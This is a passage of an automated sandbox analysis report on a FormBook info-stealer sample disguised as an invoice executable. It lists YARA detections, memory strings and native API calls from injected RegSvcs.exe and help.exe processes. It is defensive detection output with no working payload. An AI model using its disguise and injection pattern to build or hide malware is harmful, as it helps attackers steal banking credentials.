          Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000008.00000000.684489855.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: invoice#56432_Pdf.exe, 00000000.00000002.650331627.0000000002759000.00000004.00000001.sdmp, RegSvcs.exe, 00000003.00000002.663330979.0000000002BC9000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: invoice#56432_Pdf.exe, 00000000.00000002.650094349.00000000009BA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.721741339.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.906056076.0000000000950000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.906109110.0000000000AD0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.722070122.0000000001560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.663797541.0000000003D0F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.722159635.00000000018D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.660997479.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.905935613.0000000000550000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000007.00000002.721741339.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.721741339.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.906056076.0000000000950000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.906056076.0000000000950000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.906109110.0000000000AD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.906109110.0000000000AD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.722070122.0000000001560000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.722070122.0000000001560000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.663797541.0000000003D0F000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.663797541.0000000003D0F000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.722159635.00000000018D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.722159635.00000000018D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.660997479.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.660997479.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.905935613.0000000000550000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.905935613.0000000000550000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: invoice#56432_Pdf.exe
          Source: initial sampleStatic PE information: Filename: invoice#56432_Pdf.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010DFD50 NtQueryInformationProcess,3_2_010DFD50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010DFD4B NtQueryInformationProcess,3_2_010DFD4B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00419D60 NtCreateFile,7_2_00419D60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00419E10 NtReadFile,7_2_00419E10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00419E90 NtClose,7_2_00419E90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00419F40 NtAllocateVirtualMemory,7_2_00419F40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00419D5B NtCreateFile,7_2_00419D5B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00419E0B NtReadFile,7_2_00419E0B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A399A0 NtCreateSection,LdrInitializeThunk,7_2_01A399A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A39910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_01A39910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A398F0 NtReadVirtualMemory,LdrInitializeThunk,7_2_01A398F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A39860 NtQuerySystemInformation,LdrInitializeThunk,7_2_01A39860
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A39840 NtDelayExecution,LdrInitializeThunk,7_2_01A39840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A39A20 NtResumeThread,LdrInitializeThunk,7_2_01A39A20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A39A00 NtProtectVirtualMemory,LdrInitializeThunk,7_2_01A39A00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A39A50 NtCreateFile,LdrInitializeThunk,7_2_01A39A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A395D0 NtClose,LdrInitializeThunk,7_2_01A395D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A39540 NtReadFile,LdrInitializeThunk,7_2_01A39540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A397A0 NtUnmapViewOfSection,LdrInitializeThunk,7_2_01A397A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A39780 NtMapViewOfSection,LdrInitializeThunk,7_2_01A39780
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A39710 NtQueryInformationToken,LdrInitializeThunk,7_2_01A39710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A396E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_01A396E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A39660 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_01A39660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A399D0 NtCreateProcessEx,7_2_01A399D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A39950 NtQueueApcThread,7_2_01A39950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A398A0 NtWriteVirtualMemory,7_2_01A398A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A39820 NtEnumerateKey,7_2_01A39820
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A3B040 NtSuspendThread,7_2_01A3B040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A3A3B0 NtGetContextThread,7_2_01A3A3B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A39B00 NtSetValueKey,7_2_01A39B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A39A80 NtOpenDirectoryObject,7_2_01A39A80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A39A10 NtQuerySection,7_2_01A39A10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A395F0 NtQueryInformationFile,7_2_01A395F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A39520 NtWaitForSingleObject,7_2_01A39520
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A3AD30 NtSetContextThread,7_2_01A3AD30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A39560 NtWriteFile,7_2_01A39560
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A39FE0 NtCreateMutant,7_2_01A39FE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A39730 NtQueryVirtualMemory,7_2_01A39730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A3A710 NtOpenProcessToken,7_2_01A3A710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A39760 NtOpenProcess,7_2_01A39760
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A39770 NtSetInformationFile,7_2_01A39770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A3A770 NtOpenThread,7_2_01A3A770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A396D0 NtCreateKey,7_2_01A396D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A39610 NtEnumerateValueKey,7_2_01A39610
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A39670 NtQueryInformationProcess,7_2_01A39670
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A39650 NtQueryValueKey,7_2_01A39650
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_03029A50 NtCreateFile,LdrInitializeThunk,9_2_03029A50
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_03029910 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_03029910
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_030299A0 NtCreateSection,LdrInitializeThunk,9_2_030299A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_03029840 NtDelayExecution,LdrInitializeThunk,9_2_03029840
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_03029860 NtQuerySystemInformation,LdrInitializeThunk,9_2_03029860
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_03029710 NtQueryInformationToken,LdrInitializeThunk,9_2_03029710
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_03029780 NtMapViewOfSection,LdrInitializeThunk,9_2_03029780
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_03029FE0 NtCreateMutant,LdrInitializeThunk,9_2_03029FE0
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_03029650 NtQueryValueKey,LdrInitializeThunk,9_2_03029650
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_03029660 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_03029660
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_030296D0 NtCreateKey,LdrInitializeThunk,9_2_030296D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_030296E0 NtFreeVirtualMemory,LdrInitializeThunk,9_2_030296E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_03029540 NtReadFile,LdrInitializeThunk,9_2_03029540
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_030295D0 NtClose,LdrInitializeThunk,9_2_030295D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_03029B00 NtSetValueKey,9_2_03029B00
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_0302A3B0 NtGetContextThread,9_2_0302A3B0
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_03029A00 NtProtectVirtualMemory,9_2_03029A00
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_03029A10 NtQuerySection,9_2_03029A10
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_03029A20 NtResumeThread,9_2_03029A20
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_03029A80 NtOpenDirectoryObject,9_2_03029A80
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_03029950 NtQueueApcThread,9_2_03029950
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_030299D0 NtCreateProcessEx,9_2_030299D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_03029820 NtEnumerateKey,9_2_03029820
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_0302B040 NtSuspendThread,9_2_0302B040
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_030298A0 NtWriteVirtualMemory,9_2_030298A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_030298F0 NtReadVirtualMemory,9_2_030298F0
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_0302A710 NtOpenProcessToken,9_2_0302A710
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_03029730 NtQueryVirtualMemory,9_2_03029730
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_03029760 NtOpenProcess,9_2_03029760
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_0302A770 NtOpenThread,9_2_0302A770
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_03029770 NtSetInformationFile,9_2_03029770
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_030297A0 NtUnmapViewOfSection,9_2_030297A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_03029610 NtEnumerateValueKey,9_2_03029610
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_03029670 NtQueryInformationProcess,9_2_03029670
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_03029520 NtWaitForSingleObject,9_2_03029520
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_0302AD30 NtSetContextThread,9_2_0302AD30
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_03029560 NtWriteFile,9_2_03029560
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_030295F0 NtQueryInformationFile,9_2_030295F0
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_00569D60 NtCreateFile,9_2_00569D60
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_00569E10 NtReadFile,9_2_00569E10
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_00569E90 NtClose,9_2_00569E90
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_00569F40 NtAllocateVirtualMemory,9_2_00569F40
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_00569D5B NtCreateFile,9_2_00569D5B
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_00569E0B NtReadFile,9_2_00569E0B
          Source: C:\Users\user\Desktop\invoice#56432_Pdf.exeCode function: 0_2_026F94A80_2_026F94A8
          Source: C:\Users\user\Desktop\invoice#56432_Pdf.exeCode function: 0_2_026FC3A00_2_026FC3A0
          Source: C:\Users\user\Desktop\invoice#56432_Pdf.exeCode function: 0_2_026FA7580_2_026FA758
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010DFB203_2_010DFB20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010DC5083_2_010DC508
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010DF7783_2_010DF778
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010D99E03_2_010D99E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02B3A2503_2_02B3A250
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02B320B03_2_02B320B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02B309D03_2_02B309D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02B35EF83_2_02B35EF8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02B357C83_2_02B357C8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02B3770F3_2_02B3770F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02B374983_2_02B37498
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02B31C183_2_02B31C18
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02B365783_2_02B36578
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02B320A13_2_02B320A1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02B309593_2_02B30959
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02B35EE93_2_02B35EE9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02B376C33_2_02B376C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02B30E303_2_02B30E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02B357B83_2_02B357B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02B374883_2_02B37488
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02B334283_2_02B33428
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02B334193_2_02B33419
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02B31C083_2_02B31C08
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02B365683_2_02B36568
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05DCE7183_2_05DCE718
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05DC40603_2_05DC4060
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05DC72E03_2_05DC72E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05DC7CD03_2_05DC7CD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05DC1C803_2_05DC1C80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05DC3E183_2_05DC3E18
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05DC8AF03_2_05DC8AF0
          Source: